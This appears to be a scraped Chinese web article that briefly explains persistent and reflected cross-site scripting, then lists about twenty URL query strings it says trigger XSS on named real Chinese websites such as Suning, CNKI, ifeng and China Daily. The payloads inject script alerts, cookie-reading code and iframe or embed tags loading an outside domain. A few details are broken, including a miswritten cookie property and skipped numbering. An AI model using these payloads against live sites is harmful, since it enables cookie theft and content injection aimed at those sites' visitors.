注:以下检测连接均在遨游浏览器测试成功。
对一个网页来讲,XSS就是在未经授权的情况下,向里面插入内容,因为未经授权所以涛涛电脑知识网
就是漏洞。涛涛电脑知识网
但大家更多的关注的不是授权,而是插入内容,这个内容经常带有危害性。
危害更多的是对访问这个页面的其他网民,你插入的代码,在我这儿运行,这些代码实
现很多东西。“在我这儿运行”意味着代码是有环境的,所以XSS必须立足于环境。是哪种情
况下的XSS,这才最关键。
一般将XSS分为持久性和非持久性,两者都有打开某个链接然后自动运行代码(恶意构
造的参数)的特点,持久型就是代码保存在服务端的数据库,像一个网站的用户名,自我介
绍,密码等如果不做过滤就会存在XSS,当我访问你的页面,因为你的名字是一段代码,所
以我承受了这段代码,同时也承受了这段代码可能带来的损失;非持久型就是一个链接,链
接里面有参数,是一段代码,我点了之后浏览器打开这个链接,链接指向的程序执行这段代
码参数,然后返回给我运行结果,执行实质是以向程序提供代码参数做触发,是即时的。
第一个:铭万 B2B
?k=%3cscript%3ealert(%27RC%27)%3c%2fscript%3e
第二个:凤凰网
?c=friends&a=visit&ftype=6&friendName=%3C/title%3E%3Cscript%3Ealert('
RC')%3C/script%3E
第三个:中国电子网
?keyword=%3Cscript%3Ealert%28documents.cookie%29%
3C%2Fscript%3E
第四个:中华能源网
?txtitle=<script>alert(documents.cookie)</scr
ipt>
第五个:21CN
?tags=%3Cscript%3Ealert()%3C/script%3E
第六个:中国知网
?keys=%3Ciframe%20src=''%3E%3C/iframe%3E
第七个:计算机世界
?keyword=%3C%2Fspan%3E%3Cifra
me+src%3Dhttp%3A%2F%2F%3E%3C%2Fiframe%3E
第八个:苏宁易购
?searchKeywords=%3Cembed%20SRC=HTTP://WWW.CHINAXIAOE.COM%3E%3C/EMBED%3E
第九个:安博教育
?keyword=%3Ciframe+src%3Dhttp%3A%2F
%2F%3E%3Ciframe%3E
第十个:拍拍
网
kt1zn5ocpyvg6--1-48-80---3-4-3----2-2--128-0-0-PTAG,20084.2.2.html
第十一个:源码天空
?s=Random_Coder%3C%2Ftitle%3E%3Ciframe+
src%3Dhttp%3A%2F%2F%3E%3C%2Fiframe%3E
第十二个:猫扑网
?q=%3C/title%3E%3Cembed%20src=Http://www.chinaxiaoe.com%3E%3C/em
bed%3E
第十三个:瑞丽女性网
?lxkw=%3C/span%3E%3Cembed%20src=http://
%3E%3C/embed%3E
第十四个:糯米网
?k=%3C%2Ftitle%3E%3Cembed+src%3DHttp%3A%2F%
2F%3E%3C%2Fembed%3E
第十五个:中彩网
?query=Random_Coder%3C%2
Ftitle%3E%3Cembed+src%3DHttp%3A%2F%2F%3E&site=2&id=1
第十八个:太平洋网
?q=%3C%2Ftitle%3E%3Cembed+src%3Dhttp%3A%
2F%2F%3E
第十九个:盘古搜索
?orderType=1&q=%3C%2Ftitle%3E%3Cembe
d+src%3Dhttp%3A%2F%2F%3E
第二十个:7K7K 游戏
%22%2F%3E%3Cembed%20src%3Dhttp%3A%5C%2F%2F%3E.htm
第二十一个:移动搜索
?qt=%3C/title%3E%3Cembed%20src=http://www.chinaxiaoe.com%3E
第二十二个:19 楼
?keyword=%3C%2Ftitle%3E%3Cembed%20src%3
Dhttp%3A%2F%2F%3E
第二十三个:中国日报
?searchText=%22%3E%3Cembed+src%3Dhttp
%3A%2F%2F%3E